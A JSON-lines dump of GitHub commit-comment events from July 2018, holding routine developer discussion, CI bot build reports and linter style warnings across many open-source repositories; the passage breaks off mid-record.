{"id":"7903976535","type":"CommitCommentEvent","actor":{"login":"damassi"},"repo":{"name":"artsy/reaction"},"payload":{"comment":{"id":29560134,"position":25,"line":74,"path":"src/Styleguide/Components/Lightbox.tsx","commit_id":"30eef94a9a154dccc611b5b83c34a0d6b6ac17eb","created_at":"2018-07-02T00:54:01Z","updated_at":"2018-07-02T00:54:01Z","author_association":"MEMBER","body":"Could you do a find / replace for `themeProps.space[` / `color` across the codebase? "}},"created_at":"2018-07-02T00:54:01Z"}
{"id":"7903976749","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29560135,"position":null,"line":null,"path":null,"commit_id":"db4e9536668a083b47a4812ab28d4a3a623c76c8","created_at":"2018-07-02T00:54:10Z","updated_at":"2018-07-02T00:54:10Z","author_association":"NONE","body":"yes, let me accommodate that, I'm also waiting for an important fix in `libtorrent` to release another RC"}},"created_at":"2018-07-02T00:54:10Z"}
{"id":"7903981743","type":"CommitCommentEvent","actor":{"login":"bradtm2000"},"repo":{"name":"bradtm2000/Spoon-Knife"},"payload":{"comment":{"id":29560149,"position":8,"line":11,"path":"b.txt","commit_id":"573339488a04269358d10388d03048cd1ef2d16d","created_at":"2018-07-02T00:57:29Z","updated_at":"2018-07-02T00:57:29Z","author_association":"OWNER","body":"test comment\r\n1. test"}},"created_at":"2018-07-02T00:57:29Z"}
{"id":"7903983699","type":"CommitCommentEvent","actor":{"login":"finian"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29560152,"position":null,"line":null,"path":null,"commit_id":"a0d667481bc21bcd5cb4911992dcc2761aed8cff","created_at":"2018-07-02T00:58:48Z","updated_at":"2018-07-02T00:58:48Z","author_association":"CONTRIBUTOR","body":"@luckyadam 这个改动好像会导致非 jsonp 用法不能设置 cache 参数了？"}},"created_at":"2018-07-02T00:58:48Z"}
{"id":"7903983902","type":"CommitCommentEvent","actor":{"login":"Caizz93"},"repo":{"name":"CutPhoto/koubei"},"payload":{"comment":{"id":29560153,"position":null,"line":null,"path":null,"commit_id":"b5e93f93f3efe6eae6253a94292032ca97fa8c38","created_at":"2018-07-02T00:58:57Z","updated_at":"2018-07-02T00:58:57Z","author_association":"CONTRIBUTOR","body":"赞"}},"created_at":"2018-07-02T00:58:57Z"}
{"id":"7903983928","type":"CommitCommentEvent","actor":{"login":"snoopyjoe"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29560154,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-02T00:58:58Z","updated_at":"2018-07-02T00:58:58Z","author_association":"OWNER","body":"@DiR3Wolf The oopsie error should pop up only when the stream doesn't have any json info. Example, exporting an episode before the air date will export but not play and throw an error. I just replaced that normal Psvue error with the oopsie message. \r\n\r\nIf you have a stream that should play but throws error message, upload the log file so we can see what's different."}},"created_at":"2018-07-02T00:58:58Z"}
{"id":"7903986580","type":"CommitCommentEvent","actor":{"login":"OnGle"},"repo":{"name":"turnkeylinux-apps/odoo"},"payload":{"comment":{"id":29560163,"position":null,"line":null,"path":null,"commit_id":"656b0a8037116ea39207d941fc0f29bf10f32dc0","created_at":"2018-07-02T01:00:28Z","updated_at":"2018-07-02T01:00:28Z","author_association":"NONE","body":"Sorry for not replying to any of these messages, not sure why but I didn't seem to get notifications, seems like it's all resolved now but don't be afraid to ping me with @ongle if you need some clarification and I'll try to be more prudent in the future!"}},"created_at":"2018-07-02T01:00:28Z"}
{"id":"7903989629","type":"CommitCommentEvent","actor":{"login":"OnGle"},"repo":{"name":"turnkeylinux-apps/odoo"},"payload":{"comment":{"id":29560170,"position":null,"line":null,"path":null,"commit_id":"946b3656bd08fdf1d83b6245888cd4208d14ab53","created_at":"2018-07-02T01:02:11Z","updated_at":"2018-07-02T01:02:11Z","author_association":"NONE","body":"Potentially adds clarity, causes no harm and takes very little effort, I'll add that back for the 15.0 release. Cheers, and sorry for long wait."}},"created_at":"2018-07-02T01:02:11Z"}
{"id":"7903990167","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29560171,"position":null,"line":null,"path":null,"commit_id":"c326adbd8fda7133fc63c4d6b615681395be35a4","created_at":"2018-07-02T01:02:30Z","updated_at":"2018-07-02T01:02:30Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.296`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/398946801) :tada:"}},"created_at":"2018-07-02T01:02:30Z"}
{"id":"7903990202","type":"CommitCommentEvent","actor":{"login":"japhb"},"repo":{"name":"croservices/cro"},"payload":{"comment":{"id":29560172,"position":84,"line":84,"path":"docs/reference/cro-http-reverseproxy.md","commit_id":"40f6e247ade351fe799369db472b0d246a7a645b","created_at":"2018-07-02T01:02:31Z","updated_at":"2018-07-02T01:02:31Z","author_association":"CONTRIBUTOR","body":"This doesn't actually use `to-absolute`."}},"created_at":"2018-07-02T01:02:31Z"}
{"id":"7903992893","type":"CommitCommentEvent","actor":{"login":"William-Kaiser"},"repo":{"name":"judasn/Linux-Tutorial"},"payload":{"comment":{"id":29560180,"position":null,"line":null,"path":null,"commit_id":"7d2f2faa1a49f2718bf1c3bdacbdf8f6be375a4a","created_at":"2018-07-02T01:04:12Z","updated_at":"2018-07-02T01:04:12Z","author_association":"NONE","body":" 请问一下，如果初始化没有执行好，是不是不会生成mysql-error.log和mysql.pid文件"}},"created_at":"2018-07-02T01:04:12Z"}
{"id":"7903994802","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29560184,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-02T01:05:21Z","updated_at":"2018-07-02T01:05:21Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2306 of 2309 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-02T01:05:21Z"}
{"id":"7903996015","type":"CommitCommentEvent","actor":{"login":"mnestrud"},"repo":{"name":"commaai/openpilot"},"payload":{"comment":{"id":29560187,"position":null,"line":null,"path":null,"commit_id":"c169f61f3071b110fadd00b33673e67b12614937","created_at":"2018-07-02T01:06:08Z","updated_at":"2018-07-02T01:06:08Z","author_association":"NONE","body":"Honda publishes that there is a 20% variable steering ratio with a final value of 12.30.  At hwy speeds, the steering ratio increases to acknowledge how subtle changes impact drive.  My assumption is that somehow it goes from -20% at slow speeds to +20% at hwy speeds with an average of 12.3, so lets see where 13.53 gets us."}},"created_at":"2018-07-02T01:06:08Z"}
{"id":"7903996432","type":"CommitCommentEvent","actor":{"login":"FellippeHeitor"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29560192,"position":null,"line":null,"path":null,"commit_id":"6ee70f1afa3d9dd8ded201743c15711d7b79a1eb","created_at":"2018-07-02T01:06:25Z","updated_at":"2018-07-02T01:06:25Z","author_association":"COLLABORATOR","body":"    'single parameter: grayscale color (same as making r = g = b, full alpha)\r\n    a~& = _RGBA32(51, 51, 51, 255)\r\n    b~& = _RGB32(51)\r\n    PRINT a~&, b~&, match(a~& = b~&)\r\n\r\n    'two parameters: grayscale color + alpha level\r\n    a~& = _RGBA32(51, 51, 51, 125)\r\n    b~& = _RGB32(51, 125)\r\n    PRINT a~&, b~&, match(a~& = b~&)\r\n\r\n    'three parameters: usual syntax (red, green and blue levels)\r\n    a~& = _RGBA32(132, 51, 0, 255)\r\n    b~& = _RGB32(132, 51, 0)\r\n    PRINT a~&, b~&, match(a~& = b~&)\r\n\r\n    'four parameters: red, green and blue levels + alpha (same as _RGBA32)\r\n    a~& = _RGBA32(132, 51, 51, 125)\r\n    b~& = _RGB32(132, 51, 51, 125)\r\n    PRINT a~&, b~&, match(a~& = b~&)\r\n\r\n    '--------------------------------\r\n    FUNCTION match$ (result AS _BYTE)\r\n        IF result THEN match$ = \"match\" ELSE match$ = \"unmatched\"\r\n    END FUNCTION"}},"created_at":"2018-07-02T01:06:25Z"}
{"id":"7903997002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29560194,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-02T01:06:46Z","updated_at":"2018-07-02T01:06:46Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T01:06:46Z"}
{"id":"7903997631","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"Francommit/win10_emulation_station"},"payload":{"comment":{"id":29560196,"position":null,"line":null,"path":null,"commit_id":"7602db45547b68f690af4dec959583961fee6746","created_at":"2018-07-02T01:07:05Z","updated_at":"2018-07-02T01:07:05Z","author_association":"OWNER","body":"Hey,\r\n\r\nI usually don't like tinkering in the registry. Can I ask what this bug is that you came across?\r\n\r\nThanks"}},"created_at":"2018-07-02T01:07:05Z"}
{"id":"7903998102","type":"CommitCommentEvent","actor":{"login":"BerserkerTroll"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29560197,"position":5,"line":1364,"path":"kubespawner/spawner.py","commit_id":"350530fd4cf92321a36c13e10284291cce1de212","created_at":"2018-07-02T01:07:22Z","updated_at":"2018-07-02T01:07:22Z","author_association":"NONE","body":"`AttributeError: 'KubeSpawner' object has no attribute 'pods'`"}},"created_at":"2018-07-02T01:07:22Z"}
{"id":"7903998351","type":"CommitCommentEvent","actor":{"login":"msporny"},"repo":{"name":"w3c-ccg/meetings"},"payload":{"comment":{"id":29560200,"position":null,"line":null,"path":null,"commit_id":"6b3ab11c6de6ed72b4cc0139b0f97c6e13dacb3c","created_at":"2018-07-02T01:07:30Z","updated_at":"2018-07-02T01:07:30Z","author_association":"CONTRIBUTOR","body":"*Manu wonders how long IRC nicknames can be on W3C's IRC server*...\r\n\r\n*Manu wonders if we're going to have to start doing substring regex matching on nicknames as a result of this joke* ... like if he logs in as DKVxG2 or pmDxya... the scrawl.js nickname auto-matching algorithm is going to fail."}},"created_at":"2018-07-02T01:07:30Z"}
{"id":"7903999004","type":"CommitCommentEvent","actor":{"login":"thalyssra"},"repo":{"name":"aircrack-ng/aircrack-ng"},"payload":{"comment":{"id":29560204,"position":30,"line":28,"path":"build/benchmark","commit_id":"9d66b9ce0a486a0776a01156df4c607a62aef7bf","created_at":"2018-07-02T01:07:57Z","updated_at":"2018-07-02T01:07:57Z","author_association":"NONE","body":"This causes systems with 6 CPUs to go to 3 on the second iteration instead of 4.  \r\n\r\n```\r\n1.2_rev-2ef2df2,aarch64,neon,6,1267\r\n1.2_rev-2ef2df2,aarch64,neon,6,1257\r\n1.2_rev-2ef2df2,aarch64,neon,6,1260\r\n1.2_rev-2ef2df2,aarch64,neon,6,1224\r\n1.2_rev-2ef2df2,aarch64,neon,6,1202\r\n1.2_rev-2ef2df2,aarch64,neon,3,484\r\n1.2_rev-2ef2df2,aarch64,neon,3,485\r\n1.2_rev-2ef2df2,aarch64,neon,3,484\r\n1.2_rev-2ef2df2,aarch64,neon,3,487\r\n1.2_rev-2ef2df2,aarch64,neon,3,487\r\n1.2_rev-2ef2df2,aarch64,neon,2,323\r\n```"}},"created_at":"2018-07-02T01:07:57Z"}
{"id":"7904000411","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29560210,"position":null,"line":null,"path":null,"commit_id":"5155be0f0aa85a673606523de239a598394b3f8f","created_at":"2018-07-02T01:08:53Z","updated_at":"2018-07-02T01:08:53Z","author_association":"NONE","body":"Congrats. Either you can add the tuning code in, or I'll do it after you submit a PR and I merge it.\r\nI think ``ThreatRookAttackedByMinor`` is a poor name now, since we want minors or pawns.\r\nI'm not quite sure what the name should be."}},"created_at":"2018-07-02T01:08:53Z"}
{"id":"7904000537","type":"CommitCommentEvent","actor":{"login":"BerserkerTroll"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29560211,"position":5,"line":1375,"path":"kubespawner/spawner.py","commit_id":"82e69f5676927b4a07fa642d9c9f99508849900c","created_at":"2018-07-02T01:08:58Z","updated_at":"2018-07-02T01:08:58Z","author_association":"NONE","body":"`AttributeError: 'KubeSpawner' object has no attribute 'pods'`"}},"created_at":"2018-07-02T01:08:58Z"}
{"id":"7904001032","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-backend"},"payload":{"comment":{"id":29560214,"position":null,"line":null,"path":null,"commit_id":"ab474b05a864bb18554903c67779be48ad4940a1","created_at":"2018-07-02T01:09:14Z","updated_at":"2018-07-02T01:09:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tickets API](https://trello.com/c/gT8oBPxA/1-tickets-api)"}},"created_at":"2018-07-02T01:09:14Z"}
{"id":"7904001974","type":"CommitCommentEvent","actor":{"login":"Kerndog73"},"repo":{"name":"skypjack/homebrew-entt"},"payload":{"comment":{"id":29560217,"position":null,"line":null,"path":null,"commit_id":"ed5cf7115790c8d342fdc911a3f7bacb8026392d","created_at":"2018-07-02T01:09:49Z","updated_at":"2018-07-02T01:09:49Z","author_association":"COLLABORATOR","body":"I really need to be more careful 😅"}},"created_at":"2018-07-02T01:09:49Z"}
{"id":"7904005563","type":"CommitCommentEvent","actor":{"login":"JamesMcCarthy79"},"repo":{"name":"CCOSTAN/Home-AssistantConfig"},"payload":{"comment":{"id":29560225,"position":null,"line":null,"path":null,"commit_id":"975c92b80d4b4f29c8e11395617ed07ff67907dd","created_at":"2018-07-02T01:12:07Z","updated_at":"2018-07-02T01:12:07Z","author_association":"NONE","body":"Yeah that way you can move modules around as you expand which you will probably do more then most 😊\r\n\r\nRegards,\r\n\r\n[cid:image001.png@01D36CEA.6DA36C10]\r\n\r\nJames McCarthy | IoT Solutions Engineer\r\nPowertec Telecommunications Pty Ltd  |  16/511 Olsen Ave, Southport Qld 4215 Australia\r\nP  +61 7 5577 0500  |  E  james.mccarthy@powertec.com.au<mailto: james.mccarthy@powertec.com.au> |  W  www.powertecwifi.com.au<http://www.powertecwifi.com.au/>\r\n\r\n[linked-in]<https://www.linkedin.com/company/powertec-telecommunications>[facebook]<https://www.facebook.com/powertec.telecom?ref=hl> [Cel-Fi Mini Logo]\r\n\r\nFrom: Carlo Costanzo <notifications@github.com>\r\nSent: Monday, 2 July 2018 2:58 AM\r\nTo: CCOSTAN/Home-AssistantConfig <Home-AssistantConfig@noreply.github.com>\r\nCc: James McCarthy <James.mccarthy@powertec.com.au>; Comment <comment@noreply.github.com>\r\nSubject: Re: [CCOSTAN/Home-AssistantConfig] #363 - Added in New Diagram to better visualize the smart home. (975c92b)\r\n\r\n\r\nThanks! I think I need to move to a poster board type format! :)\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/CCOSTAN/Home-AssistantConfig/commit/975c92b80d4b4f29c8e11395617ed07ff67907dd#commitcomment-29558706>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AhFt3mKIwS6N04XGKAsJB6H-O19wxkENks5uCP-tgaJpZM4U-MJV>.\r\n"}},"created_at":"2018-07-02T01:12:07Z"}
{"id":"7904006826","type":"CommitCommentEvent","actor":{"login":"Soul-XXX"},"repo":{"name":"Soul-XXX/android-basic"},"payload":{"comment":{"id":29560230,"position":4,"line":4,"path":"README.md","commit_id":"fcd243a75ddeb628e4c9bd2647c588e5b47f98c0","created_at":"2018-07-02T01:12:49Z","updated_at":"2018-07-02T01:12:49Z","author_association":"OWNER","body":"Link to the app apk is: https://drive.google.com/file/d/1uP2LdcxfgBTghDqhRrymg7lQSk6oJgjL/view?usp=drivesdk."}},"created_at":"2018-07-02T01:12:49Z"}
{"id":"7904007766","type":"CommitCommentEvent","actor":{"login":"aircrack-ng"},"repo":{"name":"aircrack-ng/aircrack-ng"},"payload":{"comment":{"id":29560231,"position":30,"line":28,"path":"build/benchmark","commit_id":"9d66b9ce0a486a0776a01156df4c607a62aef7bf","created_at":"2018-07-02T01:13:21Z","updated_at":"2018-07-02T01:13:21Z","author_association":"OWNER","body":"Any suggestion for the logic in the amount of CPU to benchmark?"}},"created_at":"2018-07-02T01:13:21Z"}
{"id":"7904012965","type":"CommitCommentEvent","actor":{"login":"Soul-XXX"},"repo":{"name":"Soul-XXX/android-basic"},"payload":{"comment":{"id":29560247,"position":4,"line":4,"path":"README.md","commit_id":"fcd243a75ddeb628e4c9bd2647c588e5b47f98c0","created_at":"2018-07-02T01:16:19Z","updated_at":"2018-07-02T01:16:19Z","author_association":"OWNER","body":"Link to the app project file is: https://drive.google.com/file/d/1jYSvTR7y0ai5nH5j_or16CKCzDrVPpnx/view?usp=drivesdk"}},"created_at":"2018-07-02T01:16:19Z"}
{"id":"7904015705","type":"CommitCommentEvent","actor":{"login":"PRElias"},"repo":{"name":"Francommit/win10_emulation_station"},"payload":{"comment":{"id":29560251,"position":null,"line":null,"path":null,"commit_id":"7602db45547b68f690af4dec959583961fee6746","created_at":"2018-07-02T01:17:57Z","updated_at":"2018-07-02T01:17:57Z","author_association":"CONTRIBUTOR","body":"Hi,\r\n\r\nI was havink a black screen and found this solution: https://www.youtube.com/watch?v=fY89H8fLFSc\r\n\r\nI agree with your concern about registry, but in this particular case, I think is it safe, don't you?"}},"created_at":"2018-07-02T01:17:57Z"}
{"id":"7904019365","type":"CommitCommentEvent","actor":{"login":"zhfeng"},"repo":{"name":"rsynek/drools"},"payload":{"comment":{"id":29560262,"position":16,"line":323,"path":"drools-persistence/drools-persistence-api/src/main/java/org/drools/persistence/jta/JtaTransactionManager.java","commit_id":"46276dddc315d120c29c3307d3a8f316a5b0c52c","created_at":"2018-07-02T01:20:03Z","updated_at":"2018-07-02T01:20:03Z","author_association":"NONE","body":"I think the original behavior could be registered as the interposed synchronization. So it could be\r\n```\r\nregiterTransactionSynchronization(ts, true);\r\n```"}},"created_at":"2018-07-02T01:20:03Z"}
{"id":"7904019530","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bc/retina"},"payload":{"comment":{"id":29560264,"position":null,"line":null,"path":null,"commit_id":"002662d3eea76706eb6de58bc2991e242e85456e","created_at":"2018-07-02T01:20:08Z","updated_at":"2018-07-02T01:20:08Z","author_association":"NONE","body":"[inst/extdata/asalmon_mcw/main.r:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L2) *style:* **Variable or function name should be snake_case.**\n```r\n​LAMBDA_var <- 0.1 #Thin plate spline smoothing. Lambda=0 would be interpolation.\n^~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​RESOLUTION_var <- 500 #Plot width in pixels\n^~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​#TODO change path. make sure this main.r script is just outside the diagram_retina folder.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:8:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​#todo verify these. see the tutorial here: https://github.com/bc/retina/blob/master/tutorial.md search for the part that starts with \"#[V point of the tear,\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:10:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:10:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:15:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Only use double-quotes.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                     ^~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:77:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:15:101:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                                                   ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:29:21:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should never have a space before.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                   ~^\n```\n[inst/extdata/asalmon_mcw/main.r:29:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should always have a space after.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                     ^\n```\n[inst/extdata/asalmon_mcw/main.r:34:28:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L34) *style:* **Commas should never have a space before.**\n```r\n​        extrapolate = TRUE ,          #Predicts densities to the equator.\n                          ~^\n```\n[inst/extdata/asalmon_mcw/main.r:36:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L36) *style:* **Lines should not be more than 80 characters.**\n```r\n​        rotation_ccw = -90, # when set to -90 degrees, the rotation is unaltered from the measured orientation.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:37:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L37) *style:* **Put spaces around all infix operators.**\n```r\n​        plot_suppress=TRUE)\n                    ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:29:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:49:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                               ~^\n```\n[inst/extdata/asalmon_mcw/main.r:39:64:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                                              ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Put spaces around all infix operators.**\n```r\n​par(mfrow=c(2,2))\n        ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Commas should always have a space after.**\n```r\n​par(mfrow=c(2,2))\n              ^\n```\n[R/composite.R:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description This is a subfunction, that is useful when creating average maps.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param retina_list A list containing retina objects, with names(retina_list) all defined.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:4:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L4) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param rotation_indices Each value in this vector will correspond to the amount of rotation applied to each retina in the list.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param ... Arguments passed from other functions. You can access the thin plate spline interpolator 